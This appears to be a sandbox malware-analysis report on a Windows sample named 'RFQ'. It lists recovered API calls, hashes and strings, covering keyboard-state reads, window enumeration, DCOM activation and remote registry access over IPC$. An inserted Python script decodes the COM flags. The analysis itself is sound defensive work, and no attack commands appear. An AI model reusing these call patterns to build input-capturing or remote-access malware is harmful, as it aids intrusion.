                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                          • String ID:
                                                                          • API String ID: 2170234536-0
                                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                          • String ID:
                                                                          • API String ID: 3218148540-0
                                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                          • String ID:
                                                                          • API String ID: 136442275-0
                                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcstok.LIBCMT ref: 004674FF
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                          • String ID: X
                                                                          • API String ID: 3104067586-3081909835
                                                                          • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                          • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 440038798-2785691316
                                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
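The entries above are raw IDA-plugin output: the DWORD arguments are hex and the reader has to decode them by hand to see that this function (an AutoIt-style ObjCreate wrapper) sets up COM security with RPC_C_AUTHN_LEVEL_CONNECT / RPC_C_IMP_LEVEL_IMPERSONATE and then activates with a CLSCTX mask that includes CLSCTX_REMOTE_SERVER. The following added example, which is not part of the Joe Sandbox report or of the analysed sample, parses entries in this listing's "Name.MODULE(args), ref: ADDR" format and decodes the activation and security arguments using the documented Windows constant values. The nine sample lines are copied from the listing above; the parser, regex, function names and constant tables are this example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the nine "APIs" entries of the function at
# 0046CBC7..0046CE85, copied from the report. "?" marks an argument the
# plugin could not recover statically.
SAMPLE_ENTRIES = """\
OleInitialize.OLE32(00000000), ref: 0046CBC7
CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
CLSIDFromString.OLE32(?,?), ref: 0046CBF1
CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
_wcslen.LIBCMT ref: 0046CDB0
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
CoTaskMemFree.OLE32(?), ref: 0046CE42
CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
"""

# One listing entry: "Api.MODULE(arg,arg,...), ref: ADDR" or "Api.MODULE ref: ADDR".
ENTRY_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"       # CoCreateInstanceEx.OLE32
    r"(?:\((?P<args>[^)]*)\),)?"            # optional "(00000015,?,...),"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"   # call-site address
)

@dataclass
class ApiCall:
    api: str
    module: str
    ref: int
    args: list  # int for recovered DWORDs, None for "?"

def parse_entries(text: str) -> list:
    """Parse listing lines into ApiCall records; unknown lines raise."""
    calls = []
    for line in text.splitlines():
        line = line.strip().lstrip("• ").strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised entry: {line!r}")
        raw = m.group("args")
        args = [] if not raw else [None if a == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("module"), int(m.group("ref"), 16), args))
    return calls

# Bit flags (CLSCTX from combaseapi.h, EOAC from objidl.h) and the RPC
# authentication / impersonation level enumerations used by COM security calls.
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x2: "CLSCTX_INPROC_HANDLER",
          0x4: "CLSCTX_LOCAL_SERVER", 0x8: "CLSCTX_INPROC_SERVER16",
          0x10: "CLSCTX_REMOTE_SERVER"}
EOAC = {0x1: "EOAC_MUTUAL_AUTH", 0x20: "EOAC_STATIC_CLOAKING",
        0x40: "EOAC_DYNAMIC_CLOAKING", 0x800: "EOAC_DEFAULT"}
AUTHN_LEVEL = ["RPC_C_AUTHN_LEVEL_DEFAULT", "RPC_C_AUTHN_LEVEL_NONE",
               "RPC_C_AUTHN_LEVEL_CONNECT", "RPC_C_AUTHN_LEVEL_CALL",
               "RPC_C_AUTHN_LEVEL_PKT", "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
               "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"]
IMP_LEVEL = ["RPC_C_IMP_LEVEL_DEFAULT", "RPC_C_IMP_LEVEL_ANONYMOUS",
             "RPC_C_IMP_LEVEL_IDENTIFY", "RPC_C_IMP_LEVEL_IMPERSONATE",
             "RPC_C_IMP_LEVEL_DELEGATE"]

def decode_bits(value: int, table: dict) -> list:
    """Expand a flag DWORD into names; leftover bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return names

def level(value: int, table: list) -> str:
    return table[value] if value < len(table) else f"0x{value:X}"

# Argument index -> (parameter name, decoder), per the documented prototypes.
DECODERS = {
    "CoCreateInstance":     {2: ("dwClsContext", lambda v: decode_bits(v, CLSCTX))},
    "CoCreateInstanceEx":   {2: ("dwClsCtx", lambda v: decode_bits(v, CLSCTX)),
                             4: ("dwCount", lambda v: v)},
    "CoInitializeSecurity": {4: ("dwAuthnLevel", lambda v: level(v, AUTHN_LEVEL)),
                             5: ("dwImpLevel", lambda v: level(v, IMP_LEVEL)),
                             7: ("dwCapabilities", lambda v: decode_bits(v, EOAC))},
    "CoSetProxyBlanket":    {4: ("dwAuthnLevel", lambda v: level(v, AUTHN_LEVEL)),
                             5: ("dwImpLevel", lambda v: level(v, IMP_LEVEL)),
                             7: ("dwCapabilities", lambda v: decode_bits(v, EOAC))},
}

def decode_call(call: ApiCall) -> dict:
    """Named, decoded arguments for the COM calls we know; {} otherwise."""
    out = {}
    for idx, (name, fn) in DECODERS.get(call.api, {}).items():
        if idx < len(call.args):
            v = call.args[idx]
            out[name] = "?" if v is None else fn(v)
    return out

def decode_trace(text: str) -> dict:
    """Map each call-site address (8 hex digits) to (api, decoded arguments)."""
    return {f"{c.ref:08X}": (c.api, decode_call(c)) for c in parse_entries(text)}

def can_activate_remotely(calls: list) -> bool:
    """True if any activation call in the trace permits CLSCTX_REMOTE_SERVER (DCOM)."""
    for c in calls:
        if c.api in ("CoCreateInstance", "CoCreateInstanceEx") and len(c.args) > 2:
            if c.args[2] is not None and c.args[2] & 0x10:
                return True
    return False

if __name__ == "__main__":
    for ref, (api, decoded) in decode_trace(SAMPLE_ENTRIES).items():
        if decoded:
            print(ref, api, decoded)
    print("remote activation possible:", can_activate_remotely(parse_entries(SAMPLE_ENTRIES)))
```

Run against the listing, the decoder shows CoCreateInstance at 0046CC56 using CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER (0x5), CoInitializeSecurity at 0046CCCA requesting RPC_C_AUTHN_LEVEL_CONNECT with RPC_C_IMP_LEVEL_IMPERSONATE, CoCreateInstanceEx at 0046CE33 with 0x15, which adds CLSCTX_REMOTE_SERVER, and CoSetProxyBlanket at 0046CE85 with EOAC_DEFAULT (0x800). Entries whose arguments the plugin could not recover decode to "?", so the absence of a flag in the output never means the flag was absent at runtime.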
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                          • _wcslen.LIBCMT ref: 004610A3
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                          • String ID: ThumbnailClass
                                                                          • API String ID: 4136854206-1241985126
                                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                          • String ID: 2
                                                                          • API String ID: 1331449709-450215437
                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                          • API String ID: 3054410614-2561132961
                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 600699880-22481851
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: static
                                                                          • API String ID: 3375834691-2160076837
                                                                          APIs
